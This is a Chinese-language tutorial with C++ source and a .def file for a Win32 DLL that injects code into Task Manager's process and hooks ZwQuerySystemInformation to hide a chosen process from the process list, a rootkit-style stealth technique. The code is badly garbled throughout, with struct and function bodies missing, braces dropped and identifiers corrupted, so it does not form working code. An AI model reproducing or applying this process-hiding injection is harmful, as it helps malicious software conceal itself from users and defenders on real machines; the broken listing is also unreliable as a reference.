新建一個 Win32 DLL 專案,修改 cpp 檔案如下:
#include "stdafx.h"
#include typedef long ntstatus;
#define status_info_length_mismatch ((ntstatus)0xc0000004l)
#define nt_success(status) ((ntstatus)(status) >= 0)
typedef enum _system_information_class system_information_class;
typedef struct _client_id
client_id, *pclient_id;
typedef struct
unicode_string, *punicode_string;
typedef struct _object_attributes
object_attributes, *pobject_attributes;
typedef struct _io_counter*** io_counter***, *pio_counter***;
typedef enum thread_state;
typedef struct _vm_counters vm_counters;
typedef vm_counters *pvm_counters;
typedef struct _system_threads system_threads, *psystem_threads;
typedef struct _system_processes system_processes, *psystem_processes;
typedef
ntstatus
(ntapi *zwquerysysteminformation)(
in system_information_class systeminformationclass,
out pvoid systeminformation,
in ulong systeminformationlength,
out pulong returnlength optional
);zwquerysysteminformation zwquerysysteminformation = (zwquerysysteminformation)getprocaddress(getmodulehandle("ntdll.dll"), "zwquerysysteminformation");
pvoid g_lpremoteallocbase;
dword getfunaddress(puchar lpfunstart)
else
return dwfunaddress;
}__declspec (naked) void funstart()
};//定義函式開始的位置 release版本 沒用
__declspec (naked) void zwquerysysteminformationproxy()
}ntstatus
ntapi
zwquerysysteminformationcallback(
in system_information_class systeminformationclass,
out pvoid systeminformation,
in ulong systeminformationlength,
out pulong returnlength optional
) if (nt_success(ntstatus) && systeminformationclass == systemprocessesandthreadsinformation)
else
break;//多個pid比較時候,這裡千萬要去掉!!!
}if (!psystemprocesses->nextentrydelta) break;
prev = psystemprocesses;
psystemprocesses = (psystem_processes)((char *)psystemprocesses + psystemprocesses->nextentrydelta);
} }return ntstatus;
}__declspec (naked) void funend() };//定義函式結束的位置
boolean sethook(dword dwprocessid, dword dwhideid)//引數1注入的目標程序id 引數2當前程序id
; handle hprocess = null;
pvoid remoteallocbase = null;
dword dwfunaddress;
puchar pbuffer;
dwcodestart = getfunaddress((puchar)zwquerysysteminformationproxy);
dwcodeend = getfunaddress((puchar)funend);
dwcodesize = dwcodeend - dwcodestart;//需要注入**的長度
hprocess = openprocess(process_all_access,
false,
dwprocessid
);//開啟目標程序
if (hprocess)
}virtualprotect((pvoid)dwcodestart,
dwcodesize,
page_execute_readwrite,
&oldprotect);}
}bret = writeprocessmemory(hprocess,
remoteallocbase,
(pvoid)dwcodestart,
dwcodesize,
null
);if (bret)
}closehandle(hprocess);
} return bret;
}boolean unhook(dword dwprocessid)
return bret;
}dword gettaskmgrid()
else if (ntstatus == status_info_length_mismatch)
i++;
} else
} while (ntstatus == status_info_length_mismatch);
if (pbuffer)
}if (!psystemprocesses->nextentrydelta) break;
psystemprocesses = (psystem_processes)((char *)psystemprocesses + psystemprocesses->nextentrydelta);
} deletepbuffer;
} return dwprocessid;
}int main(int argc, char* argv)
unhook(dwtaskmgrid);
} else
}else
return 0;
}
新建一個 def 檔案,內容如下:
library "testhook"
description "sethook unhook"
exports
sethook @1
unhook @2